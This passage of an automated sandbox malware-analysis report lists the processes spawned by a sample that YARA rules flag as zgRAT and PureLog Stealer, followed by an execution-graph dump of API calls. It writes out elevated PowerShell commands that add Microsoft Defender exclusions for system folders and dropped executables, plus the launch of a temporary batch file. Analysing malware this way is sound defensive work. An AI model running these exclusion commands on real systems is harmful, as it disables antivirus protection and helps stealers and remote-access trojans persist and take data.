                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:16
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:17
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:18
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:19
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:20
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:21
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:22
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:23
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:24
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:25
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:26
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:27
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:28
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:29
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:30
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:31
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:32
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:33
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:34
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:35
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:36
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:37
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:38
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:39
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:40
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:41
                                                                        Start time:14:42:07
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat"
                                                                        Imagebase:0x7ff730d30000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:42
                                                                        Start time:14:42:07
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:43
                                                                        Start time:14:42:09
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\chcp.com
                                                                        Wow64 process (32bit):false
                                                                        Commandline:chcp 65001
                                                                        Imagebase:0x7ff76d150000
                                                                        File size:14'848 bytes
                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:44
                                                                        Start time:14:42:12
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\w32tm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                        Imagebase:0x7ff73ce70000
                                                                        File size:108'032 bytes
                                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:46
                                                                        Start time:14:42:21
                                                                        Start date:28/12/2024
                                                                        Path:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe"
                                                                        Imagebase:0xed0000
                                                                        File size:2'008'064 bytes
                                                                        MD5 hash:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 83%, ReversingLabs
                                                                        Has exited:false

                                                                        Target ID:47
                                                                        Start time:14:42:23
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                        Imagebase:0x7ff693ab0000
                                                                        File size:496'640 bytes
                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:50
                                                                        Start time:14:42:32
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff6eef20000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false


                                                                          Execution Graph

                                                                          Execution Coverage:9.5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:9.3%
                                                                          Total number of Nodes:1506
                                                                          Total number of Limit Nodes:42
24148->24074 24149->24150 24428 f07c0d 24150->24428 24152 f0d051 82 API calls 24158 f0885d 24152->24158 24153 f08992 24154 f08a5f 24153->24154 24161 f089e1 24153->24161 24159 f08ab6 24154->24159 24172 f08a6a 24154->24172 24155 f0898b 24445 f02021 74 API calls 24155->24445 24158->24148 24158->24152 24158->24153 24158->24155 24443 f08117 84 API calls 24158->24443 24444 f02021 74 API calls 24158->24444 24165 f08a4c 24159->24165 24448 f07fc0 97 API calls 24159->24448 24160 f08ab4 24166 f0959a 80 API calls 24160->24166 24163 f08b14 24161->24163 24161->24165 24167 f0a231 3 API calls 24161->24167 24162 f09105 24164 f0959a 80 API calls 24162->24164 24163->24162 24181 f08b82 24163->24181 24449 f098bc 24163->24449 24164->24148 24165->24160 24165->24163 24166->24148 24169 f08a19 24167->24169 24169->24165 24446 f092a3 97 API calls 24169->24446 24170 f0ab1a 8 API calls 24173 f08bd1 24170->24173 24172->24160 24447 f07db2 101 API calls 24172->24447 24176 f0ab1a 8 API calls 24173->24176 24193 f08be7 24176->24193 24179 f08b70 24453 f06e98 77 API calls 24179->24453 24181->24170 24182 f08cbc 24183 f08e40 24182->24183 24184 f08d18 24182->24184 24186 f08e52 24183->24186 24187 f08e66 24183->24187 24207 f08d49 24183->24207 24185 f08d8a 24184->24185 24188 f08d28 24184->24188 24195 f08167 19 API calls 24185->24195 24189 f09215 123 API calls 24186->24189 24190 f13377 75 API calls 24187->24190 24191 f08d6e 24188->24191 24199 f08d37 24188->24199 24189->24207 24192 f08e7f 24190->24192 24191->24207 24456 f077b8 111 API calls 24191->24456 24459 f13020 123 API calls 24192->24459 24193->24182 24194 f08c93 24193->24194 24202 f0981a 79 API calls 24193->24202 24194->24182 24454 f09a3c 82 API calls 24194->24454 24200 f08dbd 24195->24200 24455 f02021 74 API calls 24199->24455 24203 f08df5 24200->24203 24204 f08de6 24200->24204 24200->24207 24202->24194 24458 f09155 93 API calls __EH_prolog 24203->24458 24457 f07542 85 API calls 24204->24457 24210 f08f85 24207->24210 24460 f02021 74 API calls 
24207->24460 24209 f09090 24209->24162 24211 f0a4ed 3 API calls 24209->24211 24210->24162 24210->24209 24212 f0903e 24210->24212 24434 f09f09 SetEndOfFile 24210->24434 24213 f090eb 24211->24213 24435 f09da2 24212->24435 24213->24162 24461 f02021 74 API calls 24213->24461 24216 f09085 24217 f09620 77 API calls 24216->24217 24217->24209 24219 f090fb 24462 f06dcb 76 API calls 24219->24462 24222 f016a4 24221->24222 24478 f0cee1 24222->24478 24226 f09f59 24225->24226 24227 f09f63 24226->24227 24486 f06d0c 78 API calls 24226->24486 24227->24057 24229->24067 24231 f0b50f __EH_prolog 24230->24231 24236 f0f1d0 82 API calls 24231->24236 24233 f0b521 24237 f0b61e 24233->24237 24236->24233 24238 f0b630 _abort 24237->24238 24241 f110dc 24238->24241 24244 f1109e GetCurrentProcess GetProcessAffinityMask 24241->24244 24245 f0b597 24244->24245 24245->24089 24251 f01732 24246->24251 24248 f013d6 24248->24108 24249->24106 24250->24102 24252 f017a0 __InternalCxxFrameHandler 24251->24252 24253 f01748 24251->24253 24252->24248 24254 f01771 24253->24254 24264 f06c36 76 API calls __vswprintf_c_l 24253->24264 24255 f017c7 24254->24255 24261 f0178d ___std_exception_copy 24254->24261 24258 f23e3e 22 API calls 24255->24258 24257 f01767 24265 f06ca7 75 API calls 24257->24265 24260 f017ce 24258->24260 24260->24252 24267 f06ca7 75 API calls 24260->24267 24261->24252 24266 f06ca7 75 API calls 24261->24266 24264->24257 24265->24254 24266->24252 24267->24252 24269 f0cf4d 24268->24269 24271 f0cf54 24268->24271 24270 f0981a 79 API calls 24269->24270 24270->24271 24271->24111 24272->24113 24274 f1de78 24273->24274 24275 f0e617 53 API calls 24274->24275 24276 f1de9b 24275->24276 24277 f04092 _swprintf 51 API calls 24276->24277 24278 f1dead 24277->24278 24279 f1d4d4 16 API calls 24278->24279 24280 f11b7c 24279->24280 24280->24065 24282 f019bf 24281->24282 24285 f019bb 24281->24285 24286 f09e80 79 API calls 24282->24286 24283 f019d4 24287 f018f6 24283->24287 24285->24120 24286->24283 24288 f01945 
24287->24288 24289 f01908 24287->24289 24295 f03fa3 24288->24295 24290 f03b2d 101 API calls 24289->24290 24293 f01928 24290->24293 24293->24285 24299 f03fac 24295->24299 24296 f03b2d 101 API calls 24296->24299 24297 f01966 24297->24293 24300 f01e50 24297->24300 24299->24296 24299->24297 24312 f10e08 24299->24312 24301 f01e5a __EH_prolog 24300->24301 24320 f03bba 24301->24320 24303 f01e84 24304 f01732 78 API calls 24303->24304 24306 f01f0b 24303->24306 24305 f01e9b 24304->24305 24348 f018a9 78 API calls 24305->24348 24306->24293 24308 f01eb3 24310 f01ebf _wcslen 24308->24310 24349 f11b84 MultiByteToWideChar 24308->24349 24350 f018a9 78 API calls 24310->24350 24313 f10e0f 24312->24313 24314 f10e2a 24313->24314 24318 f06c31 RaiseException _com_raise_error 24313->24318 24316 f10e3b SetThreadExecutionState 24314->24316 24319 f06c31 RaiseException _com_raise_error 24314->24319 24316->24299 24318->24314 24319->24316 24321 f03bc4 __EH_prolog 24320->24321 24322 f03bf6 24321->24322 24323 f03bda 24321->24323 24325 f03e51 24322->24325 24328 f03c22 24322->24328 24376 f0138b 74 API calls 24323->24376 24393 f0138b 74 API calls 24325->24393 24327 f03be5 24327->24303 24328->24327 24351 f13377 24328->24351 24330 f03ca3 24332 f03d2e 24330->24332 24347 f03c9a 24330->24347 24379 f0d051 24330->24379 24331 f03c9f 24331->24330 24378 f020bd 78 API calls 24331->24378 24361 f0ab1a 24332->24361 24334 f03c71 24334->24330 24334->24331 24335 f03c8f 24334->24335 24377 f0138b 74 API calls 24335->24377 24337 f03d41 24341 f03dd7 24337->24341 24342 f03dc7 24337->24342 24385 f13020 123 API calls 24341->24385 24365 f09215 24342->24365 24345 f03dd5 24345->24347 24386 f02021 74 API calls 24345->24386 24387 f12297 24347->24387 24348->24308 24349->24310 24350->24306 24352 f1338c 24351->24352 24354 f13396 ___std_exception_copy 24351->24354 24394 f06ca7 75 API calls 24352->24394 24355 f1341c 24354->24355 24356 f134c6 24354->24356 24360 f13440 _abort 24354->24360 24395 f132aa 75 API calls 3 library calls 
24355->24395 24396 f2238d RaiseException 24356->24396 24359 f134f2 24360->24334 24362 f0ab28 24361->24362 24364 f0ab32 24361->24364 24363 f1eb38 8 API calls 24362->24363 24363->24364 24364->24337 24366 f0921f __EH_prolog 24365->24366 24397 f07c64 24366->24397 24369 f013ba 78 API calls 24370 f09231 24369->24370 24400 f0d114 24370->24400 24373 f0d114 118 API calls 24374 f09243 24373->24374 24374->24373 24375 f0928a 24374->24375 24409 f0d300 97 API calls __InternalCxxFrameHandler 24374->24409 24375->24345 24376->24327 24377->24347 24378->24330 24380 f0d072 24379->24380 24381 f0d084 24379->24381 24410 f0603a 82 API calls 24380->24410 24411 f0603a 82 API calls 24381->24411 24384 f0d07c 24384->24332 24385->24345 24386->24347 24388 f122a1 24387->24388 24389 f122ba 24388->24389 24392 f122ce 24388->24392 24412 f10eed 86 API calls 24389->24412 24391 f122c1 24391->24392 24393->24327 24394->24354 24395->24360 24396->24359 24398 f0b146 GetVersionExW 24397->24398 24399 f07c69 24398->24399 24399->24369 24407 f0d12a __InternalCxxFrameHandler 24400->24407 24401 f0d29a 24402 f0d2ce 24401->24402 24403 f0d0cb 6 API calls 24401->24403 24404 f10e08 SetThreadExecutionState RaiseException 24402->24404 24403->24402 24406 f0d291 24404->24406 24405 f18c8d 103 API calls 24405->24407 24406->24374 24407->24401 24407->24405 24407->24406 24408 f0ac05 91 API calls 24407->24408 24408->24407 24409->24374 24410->24384 24411->24384 24412->24391 24413->24130 24414->24130 24415->24128 24417 f05d2a 24416->24417 24463 f05c4b 24417->24463 24420 f05d5d 24421 f05d95 24420->24421 24468 f0b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24420->24468 24421->24144 24423 f08186 24422->24423 24424 f08232 24423->24424 24475 f0be5e 19 API calls __InternalCxxFrameHandler 24423->24475 24474 f11fac CharUpperW 24424->24474 24427 f0823b 24427->24147 24429 f07c22 24428->24429 24430 f07c5a 24429->24430 24476 f06e7a 74 API calls 24429->24476 24430->24158 24432 f07c52 24477 f0138b 74 API calls 24432->24477 24434->24212 
24436 f09db3 24435->24436 24438 f09dc2 24435->24438 24437 f09db9 FlushFileBuffers 24436->24437 24436->24438 24437->24438 24439 f09e3f SetFileTime 24438->24439 24439->24216 24440->24135 24441->24148 24442->24148 24443->24158 24444->24158 24445->24153 24446->24165 24447->24160 24448->24165 24450 f08b5a 24449->24450 24451 f098c5 GetFileType 24449->24451 24450->24181 24452 f02021 74 API calls 24450->24452 24451->24450 24452->24179 24453->24181 24454->24182 24455->24207 24456->24207 24457->24207 24458->24207 24459->24207 24460->24210 24461->24219 24462->24162 24469 f05b48 24463->24469 24466 f05c6c 24466->24420 24467 f05b48 2 API calls 24467->24466 24468->24420 24472 f05b52 24469->24472 24470 f05c3a 24470->24466 24470->24467 24472->24470 24473 f0b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24472->24473 24473->24472 24474->24427 24475->24424 24476->24432 24477->24430 24479 f0cef2 24478->24479 24484 f0a99e 86 API calls 24479->24484 24481 f0cf24 24485 f0a99e 86 API calls 24481->24485 24483 f0cf2f 24484->24481 24485->24483 24486->24227 24488 f0a6a8 24487->24488 24489 f0a6c1 FindFirstFileW 24488->24489 24490 f0a727 FindNextFileW 24488->24490 24492 f0a6d0 24489->24492 24497 f0a709 24489->24497 24491 f0a732 GetLastError 24490->24491 24490->24497 24491->24497 24493 f0bb03 GetCurrentDirectoryW 24492->24493 24494 f0a6e0 24493->24494 24495 f0a6e4 FindFirstFileW 24494->24495 24496 f0a6fe GetLastError 24494->24496 24495->24496 24495->24497 24496->24497 24497->24079 24507 f1a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24498->24507 24500 f1a5cd 24501 f1a5d9 24500->24501 24508 f1a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24500->24508 24501->23730 24501->23731 24503->23734 24504->23740 24505->23740 24506->23743 24507->24500 24508->24501 24509->23751 24511 f09f42 78 API calls 24510->24511 24512 f01fe8 24511->24512 24513 f01a04 101 API calls 24512->24513 24516 f02005 24512->24516 24514 f01ff5 24513->24514 24514->24516 24517 f0138b 74 API calls 24514->24517 24516->23759 
